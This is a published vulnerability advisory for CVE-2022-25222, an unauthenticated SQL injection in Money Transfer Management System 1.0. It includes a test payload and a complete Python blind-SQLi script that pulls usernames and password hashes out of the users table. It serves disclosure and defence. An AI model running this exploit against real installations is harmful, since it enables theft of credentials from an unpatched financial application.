

Advisories

Money Transfer Management System 1.0 - Unauthenticated SQLi

7.5

High

Discovered by

Oscar Uribe

Offensive Team, Fluid Attacks

Summary

Full name

Money Transfer Management System - Unauthenticated SQL Injection

Code name

Berry

State

Public

Release date

Mar 15, 2022

Affected product

Money Transfer Management System

Affected version(s)

Version 1.0

Vulnerability name

SQL injection

Vulnerability type

146. SQL injection

Remotely exploitable

Yes

CVSS v3.1 vector string

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

CVSS v3.1 base score

7.5

Exploit available

Yes

CVE ID(s)

CVE-2022-25222

Description

Money Transfer Management System Version 1.0 allows an unauthenticated user to inject SQL queries in admin/maintenance/manage_branch.php and admin/maintenance/manage_fee.php via the id parameter.

Proof of Concept

Steps to reproduce

Go to http://127.0.0.1/mtms/admin/maintenance/manage_branch.php
Insert the following query inside the id parameter.
?id=1' and 1=1 -- -
The server response changes if the second part of the query is true or false. To automate the process use the below exploit.

System Information

Version: Money Transfer Management System version 1.0.
Operating System: Linux.
Web Server: Apache
PHP Version: 7.4
Database and version: MySQL

Exploit

import requests
import urllib.parse

dictionary = """0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ !"#$%&\'()*+,-./:;<=>?@[\\]^_`{|}~"""

def sqli_bool(base_url,query):


 url = "?id=1' and %s -- -" % query

 #proxies = {'http':'http://127.0.0.1:8080','https':'https://127.0.0.1:8080'}
 #r = requests.get(base_url+url, proxies=proxies)
 r = requests.get(base_url+url)

 if len(r.text) > 2700:
        return True

    else:
        return False


def get_length(url, query):

    for i in range(0,200):
        current_query = "(length((%s))=%s)"%(query,str(i))
        current_query = current_query=urllib.parse.quote(current_query)
        if sqli_bool(url,current_query):
            break

    if i !=199:
        return i
    else:
        return -1


def make_query(url,query):

    # Get length
    length = get_length(url,query)

    print("[*] Getting output length:")
    if length == -1:
        print("Error getting query length")
        return 0
    print("[+] Output Length: " + str(length))

    current_result = ""

    print()
    print("[*] Getting output: ")

    for pos in range(length+1):
        for char in dictionary:

            current_query = '(substr((%s),%s,1)="%s")' %(query,str(pos),requests.utils.quote(char))
            if sqli_bool(url,current_query):
                current_result += char
                print(current_result, end='\r')
                break

    print("[+] Found: " + " " * 100)
    print(current_result)


url = "http://127.0.0.1/mtms/admin/maintenance/manage_branch.php"

# must be only 1 row
# use limit and offset to iterate

# CHANGE THIS
query = "select concat(username,':', password) as t1 from users limit 1"

make_query(url,query)

Mitigation

By 2022-03-15 there is not a patch resolving the issue.

References

Vendor page https://www.sourcecodester.com/php/15015/money-transfer-management-system-send-money-businesses-php-free-source-code.html

Timeline



Vulnerability discovered

Feb 15, 2022



Vendor contacted

Feb 15, 2022



Public disclosure

Mar 15, 2022

Start your 21-day free trial

Discover the benefits of our Continuous Hacking solution, which organizations of all sizes are already enjoying.

Try for free

Contact sales

Start your 21-day free trial

Discover the benefits of our Continuous Hacking solution, which organizations of all sizes are already enjoying.

Try for free

Contact sales

Start your 21-day free trial

Discover the benefits of our Continuous Hacking solution, which organizations of all sizes are already enjoying.

Try for free

Contact sales

Solution

Plans

Resources

Advisories

Company

Select Language



Contact sales

Try for free

Select Language



Contact sales

Try for free

Solution

Plans

Resources

Advisories

Company

Select Language



Contact sales

Try for free

Select Language



Fluid Attacks' solutions enable organizations to identify, prioritize, and remediate vulnerabilities in their software throughout the SDLC. Supported by AI, automated tools, and pentesters, Fluid Attacks accelerates companies' risk exposure mitigation and strengthens their cybersecurity posture.